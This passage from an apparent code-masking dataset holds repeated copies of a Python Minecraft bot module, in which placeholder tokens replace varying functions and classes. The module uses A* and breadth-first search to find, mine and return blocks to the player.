location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass _ImaginaryBot(_GenericBot):\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass _ImaginaryBot(_GenericBot):\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n <function token>\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass _ImaginaryBot(_GenericBot):\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n <function token>\n <function token>\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass _ImaginaryBot(_GenericBot):\n <docstring token>\n <function token>\n <function token>\n <function token>\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass _ImaginaryBot(_GenericBot):\n <docstring token>\n <function token>\n <function token>\n <function token>\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n <function token>\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return 